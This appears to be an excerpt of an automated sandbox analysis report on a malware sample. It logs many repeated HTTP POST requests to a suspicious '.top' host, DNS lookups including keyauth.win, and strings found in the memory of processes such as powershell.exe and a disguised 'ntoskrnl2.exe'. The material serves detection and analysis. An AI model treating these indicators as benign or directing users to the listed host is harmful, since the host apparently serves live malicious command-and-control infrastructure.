                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1312Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1324Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1016Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1312Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global traffic HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 128538cm.n9shteam3.top Content-Length: 1024 Expect: 100-continue
                    Source: global traffic HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 128538cm.n9shteam3.top Content-Length: 1324 Expect: 100-continue
                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic DNS traffic detected: DNS query: keyauth.win
                    Source: global traffic DNS traffic detected: DNS query: 128538cm.n9shteam3.top
                    Source: unknown HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 128538cm.n9shteam3.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                    Source: powershell.exe, 0000001D.00000002.3765455976.00000293A57F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000025.00000002.3755191167.00000233FA7B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsJ
                    Source: ntoskrnl2.exe, 00000005.00000002.2300166294.0000000000B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                    Source: powershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3492498621.00000200716E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000024.00000002.3680216370.00000200798D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: active key.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
